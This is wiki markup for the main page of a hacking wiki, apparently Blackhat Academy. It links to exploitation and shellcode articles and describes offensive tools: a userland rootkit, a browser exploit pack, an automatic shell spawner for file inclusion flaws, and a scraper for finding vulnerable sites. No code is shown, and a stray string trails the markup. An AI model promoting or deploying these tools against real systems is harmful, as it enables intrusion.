<div>{{info|<center>'''Get involved''' by signing up for and contributing to this wiki, joining [[IRC]] or subscribing to [http://reddit.blackhatacademy.org /r/blackhat]! <br />Brought to you by [http://blackhatacademy.org Blackhat Academy]</center>}}<br />
<br />
<br />
{{social}}<br />
<br />
<table width="100%"><br />
<tr style="vertical-align:top"><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Article'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Article}}</td></tr></table><br />
</td><br />
<td width="50%"><br />
<table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<br />
<big><big><center>'''Featured Tool'''</center></big></big><br />
<br />
----<br />
<br />
{{:Main Page/Featured Tool}}</td></tr></table><br />
</td><br />
</tr><br />
</table><br />
<br />
<br />
<center><table style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"><tr><td><br />
<center><big>'''Articles'''</big><br />
<br />
----<br />
<br />
'''Exploitation:'''<br />
<br />
[[Buffer overflow|Stack overflows]] &bull; [[SQL injection]] &bull; [[XSS]] &bull; [[Cookies]] &bull; [[File inclusion]] &bull; [[Command Injection|Command injection]] &bull; [[XSCF]] &bull; [[Cold Fusion Hacking|Coldfusion hacking]] &bull; [[Web Exploitation|Web exploitation]]<br />
<br />
'''Programming:'''<br />
<br />
[[Ascii shellcode]] &bull; [[C]] &bull; [[CPP|C++]] &bull; [[Perl]] &bull; [[Python]] &bull; [[LUA]] &bull; [[Polymorphic]] &bull; [[Bash book|The bash book]] &bull; [[SQL Backdoors]]<br />
<br />
<br />
<small>([[Special:AllPages|All Pages]])</small></center></td></tr></table></center><br />
<br />
<br />
<br />
{|style="border:.5em solid #aaaaaa; border-radius:.9em; -o-border-radius:radius|.9em; -icab-border-radius:.9em; -khtml-border-radius:.9em; -moz-border-radius:.9em; -webkit-border-radius:.9em; background-color:background|#dddddd; width:100%;"<br />
!colspan="6" align="center"|<big>'''Tools'''</big><br />
|-<br />
|valign="top"|'''[[Vanguard]]'''<br />
|valign="top"|''[[Web Exploitation|web application vulnerability]] testing engine written in [[perl]] with LibWhisker2 support''<br />
|<br />
|valign="top"|'''[[Jynx2]]'''<br />
|valign="top"|''Version 2.0 of the classic [[LD_Preload]] userland rootkit written in [[C]]''<br />
|-<br />
|valign="top"|'''[[Bleeding Life]]'''<br />
|valign="top"|''[[PHP]] and [[MySQL]] based browser [[buffer overflow]] exploit pack''<br />
|<br />
|valign="top"|'''[[Kolkata]]'''<br />
|valign="top"|''Configurable [[perl]] scanner that analyzes [[cryptography|checksums]] to perform fingerprinting on web applications with static file analysis''<br />
|-<br />
|valign="top"|'''[[GScrape]]'''<br />
|valign="top"|''Google scraper written in [[perl]] for rapidly identifying vulnerable websites and generating statistics''<br />
|<br />
|valign="top"|'''[[Lfi_autopwn.pl]]'''<br />
|valign="top"|''Given a [[File inclusion|file inclusion]] vulnerability, this [[Perl]] script will spawn a shell''<br />
|-<br />
|valign="top"|'''[[MySql 5 Enumeration|Mysql5 enumerator]]'''<br />
|valign="top"|''Automatically map contents or query a remote database given a URL vulnerable to [[SQL injection]] with this [[perl]] script''<br />
|<br />
|valign="top"|'''[http://chokepoint.net/?id=5 Social Network Redirection Utility]'''<br />
|valign="top"|''Rickroll your friends with [[XSCF|content-forged]] image redirects''<br />
<br />
|}</div>DPYJulietowbaijc